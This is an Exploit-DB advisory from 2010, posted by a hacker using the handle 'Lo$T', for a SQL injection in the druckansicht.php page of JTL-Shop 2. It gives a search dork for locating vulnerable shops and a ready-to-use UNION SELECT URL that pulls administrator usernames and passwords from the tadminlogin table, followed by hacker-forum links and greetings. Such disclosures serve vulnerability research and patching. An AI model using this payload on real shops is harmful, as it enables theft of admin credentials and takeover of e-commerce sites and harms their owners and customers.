JTL-Shop 2 - 'druckansicht.php' SQL Injection

EDB-ID:

11445


Author:

Lo$T

Type:

webapps


Platform:

PHP

Date:

2010-02-14


JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability

author : Lo$T

(#) Home : www.sa-hacker.com/vb<http://www.sa-hacker.com/vb><http://www.sa-hacker.com/vb> + www.sec-eviles.com/vb<http://www.sec-eviles.com/vb>


email : H_CK@live.fr<mailto:H_CK@live.fr>


Dork :" Powered by JTL-Shop 2"

exp :

http://server/Path/druckansicht.php?s=13 and 1=2 union select 1,2,3,4,5,concat(cName,0x3a,cPass),7,8,9 from tadminlogin--
Greetz TO :beloved560 + The S3r!0uS + SMDo